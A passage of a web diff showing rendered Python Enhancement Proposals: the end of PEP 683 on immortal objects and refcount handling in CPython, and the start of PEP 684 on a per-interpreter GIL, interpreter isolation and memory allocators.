On builds with much smaller maximum refcounts, like 32-bit platforms, +the consequences aren’t so obvious. Let’s say the magic refcount +were 2^30. Using the same specs as above, it would take roughly +4 seconds to accidentally immortalize an object. Under reasonable +conditions, it is still highly unlikely that an object be accidentally +immortalized. It would have to meet these criteria:

+
    +
  • targeting a non-immortal object (so not one of the high-use builtins)
  • +
  • the extension increfs without a corresponding decref +(e.g. returns from a function or method)
  • +
  • no other code decrefs the object in the meantime
  • +
+

Even at a much less frequent rate it would not take long to reach +accidental immortality (on 32-bit). However, then it would have to run +through the same number of (now noop-ing) decrefs before that one object +would be effectively leaking. This is highly unlikely, especially because +the calculations assume no decrefs.

+

Furthermore, this isn’t all that different from how such 32-bit extensions +can already incref an object past 2^31 and turn the refcount negative. +If that were an actual problem then we would have heard about it.

+

Between all of the above cases, the proposal doesn’t consider +accidental immortality a problem.

+
+
+

Stable ABI

+

The implementation approach described in this PEP is compatible +with extensions compiled to the stable ABI (with the exception +of Accidental Immortality and Accidental De-Immortalizing). +Due to the nature of the stable ABI, unfortunately, such extensions +use versions of Py_INCREF(), etc. that directly modify the object’s +ob_refcnt field. This will invalidate all the performance benefits +of immortal objects.

+

However, we do ensure that immortal objects (mostly) stay immortal +in that situation. We set the initial refcount of immortal objects to +a value for which we can identify the object as immortal and which +continues to do so even if the refcount is modified by an extension. +(For example, suppose we used one of the high refcount bits to indicate +that an object was immortal. We would set the initial refcount to a +higher value that still matches the bit, like halfway to the next bit. +See _Py_IMMORTAL_REFCNT.) +At worst, objects in that situation would feel the effects +described in the Motivation section. Even then +the overall impact is unlikely to be significant.

+
+
+

Accidental De-Immortalizing

+

32-bit builds of older stable ABI extensions can take +Accidental Immortality to the next level.

+

Hypothetically, such an extension could incref an object to a value on +the next highest bit above the magic refcount value. For example, if +the magic value were 2^30 and the initial immortal refcount were thus +2^30 + 2^29 then it would take 2^29 increfs by the extension to reach +a value of 2^31, making the object non-immortal. +(Of course, a refcount that high would probably already cause a crash, +regardless of immortal objects.)

+

The more problematic case is where such a 32-bit stable ABI extension +goes crazy decref’ing an already immortal object. Continuing with the +above example, it would take 2^29 asymmetric decrefs to drop below the +magic immortal refcount value. So an object like None could be +made mortal and subject to decref. That still wouldn’t be a problem +until somehow the decrefs continue on that object until it reaches 0. +For statically allocated immortal objects, like None, the extension +would crash the process if it tried to dealloc the object. For any +other immortal objects, the dealloc might be okay. However, there +might be runtime code expecting the formerly-immortal object to be +around forever. That code would probably crash.

+

Again, the likelihood of this happening is extremely small, even on +32-bit builds. It would require roughly a billion decrefs on that +one object without a corresponding incref. The most likely scenario is +the following:

+

A “new” reference to None is returned by many functions and methods. +Unlike with non-immortal objects, the 3.12 runtime will basically never +incref None before giving it to the extension. However, the +extension will decref it when done with it (unless it returns it). +Each time that exchange happens with the one object, we get one step +closer to a crash.

+

How realistic is it that some form of that exchange (with a single +object) will happen a billion times in the lifetime of a Python process +on 32-bit? If it is a problem, how could it be addressed?

+

As to how realistic, the answer isn’t clear currently. However, the +mitigation is simple enough that we can safely proceed under the +assumption that it would not be a problem.

+

We look at possible solutions +later on.

+
+
+
+

Alternate Python Implementations

+

This proposal is CPython-specific. However, it does relate to the +behavior of the C-API, which may affect other Python implementations. +Consequently, the effect of changed behavior described in +Backward Compatibility above also applies here (e.g. if another +implementation is tightly coupled to specific refcount values, other +than 0, or on exactly how refcounts change, then they may impacted).

+
+
+

Security Implications

+

This feature has no known impact on security.

+
+
+

Maintainability

+

This is not a complex feature so it should not cause much mental overhead for maintainers. The basic implementation doesn’t touch much code so it should not have much impact on maintainability. There may be some extra complexity due to performance penalty mitigation. However, that should be limited to where we immortalize all objects post-init and later explicitly deallocate them during runtime finalization. The code for this should be relatively concentrated.

+
+
+
+

Specification

+

The approach involves these fundamental changes:

+
    +
  • add _Py_IMMORTAL_REFCNT (the magic value) to the internal C-API
  • +
  • update Py_INCREF() and Py_DECREF() to no-op for objects +that match the magic refcount
  • +
  • do the same for any other API that modifies the refcount
  • +
  • stop modifying PyGC_Head for immortal GC objects (“containers”)
  • +
  • ensure that all immortal objects are cleaned up during +runtime finalization
  • +
+

Then setting any object’s refcount to _Py_IMMORTAL_REFCNT +makes it immortal.

+

(There are other minor, internal changes which are not described here.)

+

In the following sub-sections we dive into the most significant details. +First we will cover some conceptual topics, followed by more concrete +aspects like specific affected APIs.

+
+

Public Refcount Details

+

In Backward Compatibility we introduced possible ways that user code +might be broken by the change in this proposal. Any contributing +misunderstanding by users is likely due in large part to the names of +the refcount-related API and to how the documentation explains those +API (and refcounting in general).

+

Between the names and the docs, we can clearly see answers +to the following questions:

+
    +
  • what behavior do users expect?
  • +
  • what guarantees do we make?
  • +
  • do we indicate how to interpret the refcount value they receive?
  • +
  • what are the use cases under which a user would set an object’s +refcount to a specific value?
  • +
  • are users setting the refcount of objects they did not create?
  • +
+

As part of this proposal, we must make sure that users can clearly +understand on which parts of the refcount behavior they can rely and +which are considered implementation details. Specifically, they should +use the existing public refcount-related API and the only refcount +values with any meaning are 0 and 1. (Some code relies on 1 as an +indicator that the object can be safely modified.) All other values +are considered “not 0 or 1”.

+

This information will be clarified +in the documentation.

+

Arguably, the existing refcount-related API should be modified to reflect +what we want users to expect. Something like the following:

+
    +
  • Py_INCREF() -> Py_ACQUIRE_REF() (or only support Py_NewRef())
  • +
  • Py_DECREF() -> Py_RELEASE_REF()
  • +
  • Py_REFCNT() -> Py_HAS_REFS()
  • +
  • Py_SET_REFCNT() -> Py_RESET_REFS() and Py_SET_NO_REFS()
  • +
+

However, such a change is not a part of this proposal. It is included +here to demonstrate the tighter focus for user expectations that would +benefit this change.

+
+
+

Constraints

+
    +
  • ensure that otherwise immutable objects can be truly immutable
  • +
  • minimize performance penalty for normal Python use cases
  • +
  • be careful when immortalizing objects that we don’t actually expect +to persist until runtime finalization.
  • +
  • be careful when immortalizing objects that are not otherwise immutable
  • +
  • __del__ and weakrefs must continue working properly
  • +
+

Regarding “truly” immutable objects, this PEP doesn’t impact the +effective immutability of any objects, other than the per-object +runtime state (e.g. refcount). So whether or not some immortal object +is truly (or even effectively) immutable can only be settled separately +from this proposal. For example, str objects are generally considered +immutable, but PyUnicodeObject holds some lazily cached data. This +PEP has no influence on how that state affects str immutability.

+
+
+

Immortal Mutable Objects

+

Any object can be marked as immortal. We do not propose any +restrictions or checks. However, in practice the value of making an +object immortal relates to its mutability and depends on the likelihood +it would be used for a sufficient portion of the application’s lifetime. +Marking a mutable object as immortal can make sense in some situations.

+

Many of the use cases for immortal objects center on immutability, so +that threads can safely and efficiently share such objects without +locking. For this reason a mutable object, like a dict or list, would +never be shared (and thus no immortality). However, immortality may +be appropriate if there is sufficient guarantee that the normally +mutable object won’t actually be modified.

+

On the other hand, some mutable objects will never be shared between +threads (at least not without a lock like the GIL). In some cases it +may be practical to make some of those immortal too. For example, +sys.modules is a per-interpreter dict that we do not expect to +ever get freed until the corresponding interpreter is finalized +(assuming it isn’t replaced). By making it immortal, we would +no longer incur the extra overhead during incref/decref.

+

We explore this idea further in the mitigations section below.

+
+
+

Implicitly Immortal Objects

+

If an immortal object holds a reference to a normal (mortal) object +then that held object is effectively immortal. This is because that +object’s refcount can never reach 0 until the immortal object releases +it.

+

Examples:

+
    +
  • containers like dict and list
  • +
  • objects that hold references internally like PyTypeObject with +its tp_subclasses and tp_weaklist
  • +
  • an object’s type (held in ob_type)
  • +
+

Such held objects are thus implicitly immortal for as long as they are +held. In practice, this should have no real consequences since it +really isn’t a change in behavior. The only difference is that the +immortal object (holding the reference) doesn’t ever get cleaned up.

+

We do not propose that such implicitly immortal objects be changed +in any way. They should not be explicitly marked as immortal just +because they are held by an immortal object. That would provide +no advantage over doing nothing.

+
+
+

Un-Immortalizing Objects

+

This proposal does not include any mechanism for taking an immortal +object and returning it to a “normal” condition. Currently there +is no need for such an ability.

+

On top of that, the obvious approach is to simply set the refcount to a small value. However, at that point there is no way of knowing which value would be safe. Ideally we’d set it to the value that it would have been if it hadn’t been made immortal, but that value will have long been lost. Hence the complexities involved make it less likely that an object could safely be un-immortalized, even if we had a good reason to do so.

+
+
+

_Py_IMMORTAL_REFCNT

+

We will add two internal constants:

+
_Py_IMMORTAL_BIT - has the top-most available bit set (e.g. 2^62)
+_Py_IMMORTAL_REFCNT - has the two top-most available bits set
+
+
+

The actual top-most bit depends on existing uses for refcount bits, +e.g. the sign bit or some GC uses. We will use the highest bit possible +after consideration of existing uses.

+

The refcount for immortal objects will be set to _Py_IMMORTAL_REFCNT +(meaning the value will be halfway between _Py_IMMORTAL_BIT and the +value at the next highest bit). However, to check if an object is +immortal we will compare (bitwise-and) its refcount against just +_Py_IMMORTAL_BIT.

+

The difference means that an immortal object will still be considered +immortal, even if somehow its refcount were modified (e.g. by an older +stable ABI extension).

+

Note that the top two bits of the refcount are already reserved for other uses. That’s why we are using the third top-most bit.
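
To make the scheme concrete, here is a minimal sketch of the constants and check described above. The bit position is just the example value from this section, and the helper name is an illustrative assumption, not the actual implementation:

#include <stdint.h>

/* Example position only; the real choice depends on existing
   refcount bit uses, as noted above. */
#define _Py_IMMORTAL_BIT     ((int64_t)1 << 62)

/* The two top-most available bits set: halfway between
   _Py_IMMORTAL_BIT and the value at the next highest bit. */
#define _Py_IMMORTAL_REFCNT  (_Py_IMMORTAL_BIT | (_Py_IMMORTAL_BIT >> 1))

/* Hypothetical helper: compare against the bit alone so the object
   stays immortal even if its refcount has drifted. */
static inline int
_Py_IsImmortal_sketch(int64_t refcnt)
{
    return (refcnt & _Py_IMMORTAL_BIT) != 0;
}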

+

The implementation is also open to using other values for the immortal +bit, such as the sign bit or 2^31 (for saturated refcounts on 64-bit).

+
+
+

Affected API

+

API that will now ignore immortal objects:

+
    +
  • (public) Py_INCREF()
  • +
  • (public) Py_DECREF()
  • +
  • (public) Py_SET_REFCNT()
  • +
  • (private) _Py_NewReference()
  • +
+

API that exposes refcounts (unchanged but may now return large values):

+
    +
  • (public) Py_REFCNT()
  • +
  • (public) sys.getrefcount()
  • +
+

(Note that _Py_RefTotal, and consequently sys.gettotalrefcount(), +will not be affected.)

+

TODO: clarify the status of _Py_RefTotal.

+

Also, immortal objects will not participate in GC.

+
+
+

Immortal Global Objects

+

All runtime-global (builtin) objects will be made immortal. +That includes the following:

+
    +
  • singletons (None, True, False, Ellipsis, NotImplemented)
  • +
  • all static types (e.g. PyLong_Type, PyExc_Exception)
  • +
  • all static objects in _PyRuntimeState.global_objects (e.g. identifiers, +small ints)
  • +
+

The question of making the full objects actually immutable (e.g. +for per-interpreter GIL) is not in the scope of this PEP.

+
+
+

Object Cleanup

+

In order to clean up all immortal objects during runtime finalization, +we must keep track of them.

+

For GC objects (“containers”) we’ll leverage the GC’s permanent +generation by pushing all immortalized containers there. During +runtime shutdown, the strategy will be to first let the runtime try +to do its best effort of deallocating these instances normally. Most +of the module deallocation will now be handled by +pylifecycle.c:finalize_modules() where we clean up the remaining +modules as best as we can. It will change which modules are available +during __del__, but that’s already explicitly undefined behavior +in the docs. Optionally, we could do some topological ordering +to guarantee that user modules will be deallocated first before +the stdlib modules. Finally, anything left over (if any) can be found +through the permanent generation GC list which we can clear +after finalize_modules() is done.

+

For non-container objects, the tracking approach will vary on a +case-by-case basis. In nearly every case, each such object is directly +accessible on the runtime state, e.g. in a _PyRuntimeState or +PyInterpreterState field. We may need to add a tracking mechanism +to the runtime state for a small number of objects.

+

None of the cleanup will have a significant effect on performance.

+
+
+

Performance Regression Mitigations

+

In the interest of clarity, here are some of the ways we are going +to try to recover some of the 4% performance +we lose with the naive implementation of immortal objects.

+

Note that none of this section is actually part of the proposal.

+
+

at the end of runtime init, mark all objects as immortal

+

We can apply the concept from +Immortal Mutable Objects in the pursuit of getting back some of +that 4% performance we lose with the naive implementation of immortal +objects. At the end of runtime init we can mark all objects as +immortal and avoid the extra cost in incref/decref. We only need +to worry about immutability with objects that we plan on sharing +between threads without a GIL.

+
+
+

drop unnecessary hard-coded refcount operations

+

Parts of the C-API interact specifically with objects that we know +to be immortal, like Py_RETURN_NONE. Such functions and macros +can be updated to drop any refcount operations.

+
+
+

specialize for immortal objects in the eval loop

+

There are opportunities to optimize operations in the eval loop +involving specific known immortal objects (e.g. None). The +general mechanism is described in PEP 659. Also see Pyston.

+
+
+

other possibilities

+
    +
  • mark every interned string as immortal
  • +
  • mark the “interned” dict as immortal if shared else share all interned strings
  • +
  • (Larry,MAL) mark all constants unmarshalled for a module as immortal
  • +
  • (Larry,MAL) allocate (immutable) immortal objects in their own memory page(s)
  • +
  • saturated refcounts using the 32 least-significant bits
  • +
+
+
+
+

Solutions for Accidental De-Immortalization

+

In the Accidental De-Immortalizing section we outlined a possible +negative consequence of immortal objects. Here we look at some +of the options to deal with that.

+

Note that we enumerate solutions here to illustrate that satisfactory +options are available, rather than to dictate how the problem will +be solved.

+

Also note the following:

+
    +
  • this only matters in the 32-bit stable-ABI case
  • +
  • it only affects immortal objects
  • +
  • there are no user-defined immortal objects, only built-in types
  • +
  • most immortal objects will be statically allocated +(and thus already must fail if tp_dealloc() is called)
  • +
  • only a handful of immortal objects will be used often enough +to possibly face this problem in practice (e.g. None)
  • +
  • the main problem to solve is crashes coming from tp_dealloc()
  • +
+

One fundamental observation for a solution is that we can reset +an immortal object’s refcount to _Py_IMMORTAL_REFCNT +when some condition is met.

+

With all that in mind, a simple, yet effective, solution would be to reset an immortal object’s refcount in tp_dealloc(). NoneType and bool already have a tp_dealloc() that calls Py_FatalError() if triggered. The same goes for other types based on certain conditions, like PyUnicodeObject (depending on unicode_is_singleton()), PyTupleObject, and PyTypeObject. In fact, the same check is important for all statically declared objects. For those types, we would instead reset the refcount. For the remaining cases we would introduce the check. In all cases, the overhead of the check in tp_dealloc() should be too small to matter.
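
For example, a rough sketch of such a tp_dealloc() (reusing the hypothetical constants from the earlier sketch; the actual deallocators differ per type):

#include <Python.h>

/* Hypothetical tp_dealloc for a type whose instances may be immortal.
   This is only reached if an outdated (32-bit stable-ABI) extension
   wrapped the immortal refcount all the way down to 0. */
static void
example_dealloc(PyObject *op)
{
    /* Instead of freeing the object (and crashing later users of it),
       restore the immortal refcount. */
    Py_SET_REFCNT(op, _Py_IMMORTAL_REFCNT);
}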

+

Other (less practical) solutions:

+
    +
  • periodically reset the refcount for immortal objects
  • +
  • only do that for high-use objects
  • +
  • only do it if a stable-ABI extension has been imported
  • +
  • provide a runtime flag for disabling immortality
  • +
+

(The discussion thread +has further detail.)

+

Regardless of the solution we end up with, we can do something else +later if necessary.

+

TODO: Add a note indicating that the implemented solution does not +affect the overall ~performance-neutral~ outcome.

+
+
+

Documentation

+

The immortal objects behavior and API are internal implementation details and will not be added to the documentation.

+

However, we will update the documentation to make public guarantees +about refcount behavior more clear. That includes, specifically:

+
    +
  • Py_INCREF() - change “Increment the reference count for object o.” +to “Indicate taking a new reference to object o.”
  • +
  • Py_DECREF() - change “Decrement the reference count for object o.” +to “Indicate no longer using a previously taken reference to object o.”
  • +
  • similar for Py_XINCREF(), Py_XDECREF(), Py_NewRef(), +Py_XNewRef(), Py_Clear()
  • +
  • Py_REFCNT() - add “The refcounts 0 and 1 have specific meanings +and all others only mean code somewhere is using the object, +regardless of the value. +0 means the object is not used and will be cleaned up. +1 means code holds exactly a single reference.”
  • +
  • Py_SET_REFCNT() - refer to Py_REFCNT() about how values over 1 may be substituted with some other value
  • +
+

We may also add a note about immortal objects to the following, +to help reduce any surprise users may have with the change:

+
    +
  • Py_SET_REFCNT() (a no-op for immortal objects)
  • +
  • Py_REFCNT() (value may be surprisingly large)
  • +
  • sys.getrefcount() (value may be surprisingly large)
  • +
+

Other APIs that might benefit from such notes are currently undocumented. We wouldn’t add such a note anywhere else (including for Py_INCREF() and Py_DECREF()) since the feature is otherwise transparent to users.

+
+
+
+

Reference Implementation

+

The implementation is proposed on GitHub:

+

https://github.com/python/cpython/pull/19474

+
+
+

Open Issues

+ +
+
+

References

+
+

Prior Art

+ +
+
+

Discussions

+

This was discussed in December 2021 on python-dev:

+ +
+
+

Runtime Object State

+

Here is the internal state that the CPython runtime keeps +for each Python object:

+
  • PyObject.ob_refcnt - the object’s reference count
  • _PyObject_HEAD_EXTRA - (only if CPython was built with Py_TRACE_REFS) the object’s place in the runtime’s list of all objects
  • PyGC_Head - (only for types with Py_TPFLAGS_HAVE_GC set) the GC’s bookkeeping for the object
+

ob_refcnt is part of the memory allocated for every object. +However, _PyObject_HEAD_EXTRA is allocated only if CPython was built +with Py_TRACE_REFS defined. PyGC_Head is allocated only if the +object’s type has Py_TPFLAGS_HAVE_GC set. Typically this is only +container types (e.g. list). Also note that PyObject.ob_refcnt +and _PyObject_HEAD_EXTRA are part of PyObject_HEAD.

+
+
+

Reference Counting, with Cyclic Garbage Collection

+

Garbage collection is a memory management feature of some programming +languages. It means objects are cleaned up (e.g. memory freed) +once they are no longer used.

+

Refcounting is one approach to garbage collection. The language runtime +tracks how many references are held to an object. When code takes +ownership of a reference to an object or releases it, the runtime +is notified and it increments or decrements the refcount accordingly. +When the refcount reaches 0, the runtime cleans up the object.

+

With CPython, code must explicitly take or release references using the C-API’s Py_INCREF() and Py_DECREF(). These macros happen to directly modify the object’s refcount (unfortunately, since that causes ABI compatibility issues if we want to change our garbage collection scheme). Also, when an object is cleaned up in CPython, it also releases any references (and resources) it owns (before its memory is freed).
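
For example, typical C-API code manages references explicitly like this:

#include <Python.h>

/* Receives a borrowed reference and holds its own while working. */
static void
use_object(PyObject *obj)
{
    Py_INCREF(obj);   /* notify the runtime that we hold a reference */
    /* ... use obj; it cannot be cleaned up while we hold it ... */
    Py_DECREF(obj);   /* release it; if the refcount reaches 0,
                         the runtime cleans the object up here */
}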

+

Sometimes objects may be involved in reference cycles, e.g. where +object A holds a reference to object B and object B holds a reference +to object A. Consequently, neither object would ever be cleaned up +even if no other references were held (i.e. a memory leak). The +most common objects involved in cycles are containers.

+

CPython has dedicated machinery to deal with reference cycles, which +we call the “cyclic garbage collector”, or often just +“garbage collector” or “GC”. Don’t let the name confuse you. +It only deals with breaking reference cycles.

+

See the docs for a more detailed explanation of refcounting +and cyclic garbage collection:

+ +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0683.rst

+

Last modified: 2024-06-12 18:00:45 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0684/index.html new file mode 100644 index 00000000000..0f626817afd --- /dev/null +++ b/pep-0684/index.html @@ -0,0 +1,1022 @@ + PEP 684 – A Per-Interpreter GIL | peps.python.org
+
+


+ + +
+
+
+

PEP 684 – A Per-Interpreter GIL

+
+
Author:
+
Eric Snow <ericsnowcurrently at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Requires:
+
683
+
Created:
+
08-Mar-2022
+
Python-Version:
+
3.12
+
Post-History:
+
08-Mar-2022, +29-Sep-2022, +28-Oct-2022
+
Resolution:
+
Discourse message
+
+
+
+
+
+

Abstract

+

Since Python 1.5 (1997), CPython users can run multiple interpreters +in the same process. However, interpreters in the same process +have always shared a significant +amount of global state. This is a source of bugs, with a growing +impact as more and more people use the feature. Furthermore, +sufficient isolation would facilitate true multi-core parallelism, +where interpreters no longer share the GIL. The changes outlined in +this proposal will result in that level of interpreter isolation.

+
+
+

High-Level Summary

+

At a high level, this proposal changes CPython in the following ways:

+
    +
  • stops sharing the GIL between interpreters, given sufficient isolation
  • +
  • adds several new interpreter config options for isolation settings
  • +
  • keeps incompatible extensions from causing problems
  • +
+
+

The GIL

+

The GIL protects concurrent access to most of CPython’s runtime state. +So all that GIL-protected global state must move to each interpreter +before the GIL can.

+

(In a handful of cases, other mechanisms can be used to ensure +thread-safe sharing instead, such as locks or “immortal” objects.)

+
+
+

CPython Runtime State

+

Properly isolating interpreters requires that most of CPython’s +runtime state be stored in the PyInterpreterState struct. Currently, +only a portion of it is; the rest is found either in C global variables +or in _PyRuntimeState. Most of that will have to be moved.

+

This directly coincides with an ongoing effort (of many years) to greatly +reduce internal use of global variables and consolidate the runtime +state into _PyRuntimeState and PyInterpreterState. +(See Consolidating Runtime Global State below.) That project has +significant merit on its own +and has faced little controversy. So, while a per-interpreter GIL +relies on the completion of that effort, that project should not be +considered a part of this proposal–only a dependency.

+
+
+

Other Isolation Considerations

+

CPython’s interpreters must be strictly isolated from each other, with +few exceptions. To a large extent they already are. Each interpreter +has its own copy of all modules, classes, functions, and variables. +The CPython C-API docs explain further.

+

However, aside from what has already been mentioned (e.g. the GIL), +there are a couple of ways in which interpreters still share some state.

+

First of all, some process-global resources (e.g. memory, +file descriptors, environment variables) are shared. There are no +plans to change this.

+

Second, some isolation is faulty due to bugs or implementations that +did not take multiple interpreters into account. This includes +CPython’s runtime and the stdlib, as well as extension modules that +rely on global variables. Bugs should be opened in these cases, +as some already have been.

+
+
+

Depending on Immortal Objects

+

PEP 683 introduces immortal objects as a CPython-internal feature. +With immortal objects, we can share any otherwise immutable global +objects between all interpreters. Consequently, this PEP does not +need to address how to deal with the various objects +exposed in the public C-API. +It also simplifies the question of what to do about the builtin +static types. (See Global Objects below.)

+

Both issues have alternate solutions, but everything is simpler with +immortal objects. If PEP 683 is not accepted then this one will be +updated with the alternatives. This lets us reduce noise in this +proposal.

+
+
+
+

Motivation

+

The fundamental problem we’re solving here is a lack of true multi-core +parallelism (for Python code) in the CPython runtime. The GIL is the +cause. While it usually isn’t a problem in practice, at the very least +it makes Python’s multi-core story murky, which makes the GIL +a consistent distraction.

+

Isolated interpreters are also an effective mechanism to support +certain concurrency models. PEP 554 discusses this in more detail.

+
+

Indirect Benefits

+

Most of the effort needed for a per-interpreter GIL has benefits that +make those tasks worth doing anyway:

+
    +
  • makes multiple-interpreter behavior more reliable
  • +
  • has led to fixes for long-standing runtime bugs that otherwise +hadn’t been prioritized
  • +
  • has been exposing (and inspiring fixes for) previously unknown runtime bugs
  • +
  • has driven cleaner runtime initialization (PEP 432, PEP 587)
  • +
  • has driven cleaner and more complete runtime finalization
  • +
  • led to structural layering of the C-API (e.g. Include/internal)
  • +
  • also see Benefits to Consolidation below
  • +
+

Furthermore, much of that work benefits other CPython-related projects:

+ +
+
+

Existing Use of Multiple Interpreters

+

The C-API for multiple interpreters has been used for many years. +However, until relatively recently the feature wasn’t widely known, +nor extensively used (with the exception of mod_wsgi).

+

In the last few years use of multiple interpreters has been increasing. +Here are some of the public projects using the feature currently:

+ +

Note that, with PEP 554, multiple interpreter usage would likely +grow significantly (via Python code rather than the C-API).

+
+
+

PEP 554 (Multiple Interpreters in the Stdlib)

+

PEP 554 is strictly about providing a minimal stdlib module +to give users access to multiple interpreters from Python code. +In fact, it specifically avoids proposing any changes related to +the GIL. Consider, however, that users of that module would benefit +from a per-interpreter GIL, which makes PEP 554 more appealing.

+
+
+
+

Rationale

+

During initial investigations in 2014, a variety of possible solutions +for multi-core Python were explored, but each had its drawbacks +without simple solutions:

+
    +
  • the existing practice of releasing the GIL in extension modules
      +
    • doesn’t help with Python code
    • +
    +
  • +
  • other Python implementations (e.g. Jython, IronPython)
      +
    • CPython dominates the community
    • +
    +
  • +
  • remove the GIL (e.g. gilectomy, “no-gil”)
      +
    • too much technical risk (at the time)
    • +
    +
  • +
  • Trent Nelson’s “PyParallel” project
      +
    • incomplete; Windows-only at the time
    • +
    +
  • +
  • multiprocessing
      +
    • too much work to make it effective enough; +high penalties in some situations (at large scale, Windows)
    • +
    +
  • +
  • other parallelism tools (e.g. dask, ray, MPI)
      +
    • not a fit for the runtime/stdlib
    • +
    +
  • +
  • give up on multi-core (e.g. async, do nothing)
      +
    • this can only end in tears
    • +
    +
  • +
+

Even in 2014, it was fairly clear that a solution using isolated +interpreters did not have a high level of technical risk and that +most of the work was worth doing anyway. +(The downside was the volume of work to be done.)

+
+
+

Specification

+

As summarized above, this proposal involves the +following changes, in the order they must happen:

+
    +
  1. consolidate global runtime state +(including objects) into _PyRuntimeState
  2. +
  3. move nearly all of the state down into PyInterpreterState
  4. +
  5. finally, move the GIL down into PyInterpreterState
  6. +
  7. everything else
      +
    • update the C-API
    • +
    • implement extension module restrictions
    • +
    • work with popular extension maintainers to help +with multi-interpreter support
    • +
    +
  8. +
+
+

Per-Interpreter State

+

The following runtime state will be moved to PyInterpreterState:

+
    +
  • all global objects that are not safely shareable (fully immutable)
  • +
  • the GIL
  • +
  • most mutable data that’s currently protected by the GIL
  • +
  • mutable data that’s currently protected by some other per-interpreter lock
  • +
  • mutable data that may be used independently in different interpreters +(also applies to extension modules, including those with multi-phase init)
  • +
  • all other mutable data not otherwise excluded below
  • +
+

Furthermore, a portion of the full global state has already been +moved to the interpreter, including GC, warnings, and atexit hooks.

+

The following runtime state will not be moved:

+
    +
  • global objects that are safely shareable, if any
  • +
  • immutable data, often const
  • +
  • effectively immutable data (treated as immutable), for example:
      +
    • some state is initialized early and never modified again
    • +
    • hashes for strings (PyUnicodeObject) are idempotently calculated +when first needed and then cached
    • +
    +
  • +
  • all data that is guaranteed to be modified exclusively in the main thread, +including:
      +
    • state used only in CPython’s main()
    • +
    • the REPL’s state
    • +
    • data modified only during runtime init (effectively immutable afterward)
    • +
    +
  • +
  • mutable data that’s protected by some global lock (other than the GIL)
  • +
  • global state in atomic variables
  • +
  • mutable global state that can be changed (sensibly) to atomic variables
  • +
+
+

Memory Allocators

+

This is one of the most sensitive parts of the work to isolate interpreters. +The simplest solution is to move the global state of the internal +“small block” allocator to PyInterpreterState, as we are doing with +nearly all other runtime state. The following elaborates on the details +and rationale.

+

CPython provides a memory management C-API, with three allocator domains: +“raw”, “mem”, and “object”. Each provides the equivalent of malloc(), +calloc(), realloc(), and free(). A custom allocator for each +domain can be set during runtime initialization and the current allocator +can be wrapped with a hook using the same API (for example, the stdlib +tracemalloc module). The allocators are currently runtime-global, +shared by all interpreters.

+

The “raw” allocator is expected to be thread-safe and defaults to glibc’s +allocator (malloc(), etc.). However, the “mem” and “object” allocators +are not expected to be thread-safe and currently may rely on the GIL for +thread-safety. This is partly because the default allocator for both, +AKA “pyobject”, is not thread-safe. This is due to how all state for +that allocator is stored in C global variables. +(See Objects/obmalloc.c.)

+

Thus we come back to the question of isolating runtime state. In order +for interpreters to stop sharing the GIL, allocator thread-safety +must be addressed. If interpreters continue sharing the allocators +then we need some other way to get thread-safety. Otherwise interpreters +must stop sharing the allocators. In both cases there are a number of +possible solutions, each with potential downsides.

+

To keep sharing the allocators, the simplest solution is to use +a granular runtime-global lock around the calls to the “mem” and “object” +allocators in PyMem_Malloc(), PyObject_Malloc(), etc. This would +impact performance, but there are some ways to mitigate that (e.g. only +start locking once the first subinterpreter is created).
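
As a sketch, that option might look like the following (illustrative only: the wrapper name is hypothetical, and this is not the design ultimately chosen below):

#include <Python.h>
#include "pythread.h"

static PyThread_type_lock mem_lock;   /* allocated once during runtime
                                         init with PyThread_allocate_lock() */

/* Hypothetical locked entry point for the "mem" allocator domain. */
void *
locked_mem_malloc(size_t size)
{
    PyThread_acquire_lock(mem_lock, WAIT_LOCK);
    void *ptr = PyMem_Malloc(size);
    PyThread_release_lock(mem_lock);
    return ptr;
}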

+

Another way to keep sharing the allocators is to require that the “mem” +and “object” allocators be thread-safe. This would mean we’d have to +make the pyobject allocator implementation thread-safe. That could +even involve re-implementing it using an extensible allocator like +mimalloc. The potential downside is in the cost to re-implement +the allocator and the risk of defects inherent to such an endeavor.

+

Regardless, a switch to requiring thread-safe allocators would impact +anyone that embeds CPython and currently sets a thread-unsafe allocator. +We’d need to consider who might be affected and how we reduce any +negative impact (e.g. add a basic C-API to help make an allocator +thread-safe).

+

If we did stop sharing the allocators between interpreters, we’d have +to do so only for the “mem” and “object” allocators. We might also need +to keep a full set of global allocators for certain runtime-level usage. +There would be some performance penalty due to looking up the current +interpreter and then pointer indirection to get the allocators. +Embedders would also likely have to provide a new allocator context +for each interpreter. On the plus side, allocator hooks (e.g. tracemalloc) +would not be affected.

+

Ultimately, we will go with the simplest option:

+
    +
  • keep the allocators in the global runtime state
  • +
  • require that they be thread-safe
  • +
  • move the state of the default object allocator (AKA “small block” +allocator) to PyInterpreterState
  • +
+

We experimented with a rough implementation and found it was fairly +straightforward, and the performance penalty was essentially zero.

+
+
+
+

C-API

+

Internally, the interpreter state will now track how the import system +should handle extension modules which do not support use with multiple +interpreters. See Restricting Extension Modules below. We’ll refer +to that setting here as “PyInterpreterState.strict_extension_compat”.

+

The following API will be made public, if they haven’t been already:

+
    +
  • PyInterpreterConfig (struct)
  • +
  • PyInterpreterConfig_INIT (macro)
  • +
  • PyInterpreterConfig_LEGACY_INIT (macro)
  • +
  • PyThreadState * Py_NewInterpreterFromConfig(PyInterpreterConfig *)
  • +
+

We will add two new fields to PyInterpreterConfig:

+
    +
  • int own_gil
  • +
  • int strict_extensions_compat
  • +
+

We may add other fields over time, as needed (e.g. “own_initial_thread”).

+

Regarding the initializer macros, PyInterpreterConfig_INIT would be used to get an isolated interpreter that also avoids subinterpreter-unfriendly features. It would be the default for interpreters created through PEP 554. The unrestricted (status quo) behavior will continue to be available through PyInterpreterConfig_LEGACY_INIT, which is already used for the main interpreter and Py_NewInterpreter(). This will not change.
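
For illustration, creating an isolated interpreter with the API as described in this PEP might look like the following sketch (written against the proposed signatures above; the final C-API may differ in its details):

#include <Python.h>

void
run_in_isolated_interpreter(void)
{
    /* Isolated defaults, including own_gil = 1 per this PEP. */
    PyInterpreterConfig config = PyInterpreterConfig_INIT;

    PyThreadState *tstate = Py_NewInterpreterFromConfig(&config);
    if (tstate == NULL) {
        return;  /* interpreter creation failed */
    }
    /* ... run code in the new interpreter ... */
    Py_EndInterpreter(tstate);
}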

+

A note about the “main” interpreter:

+

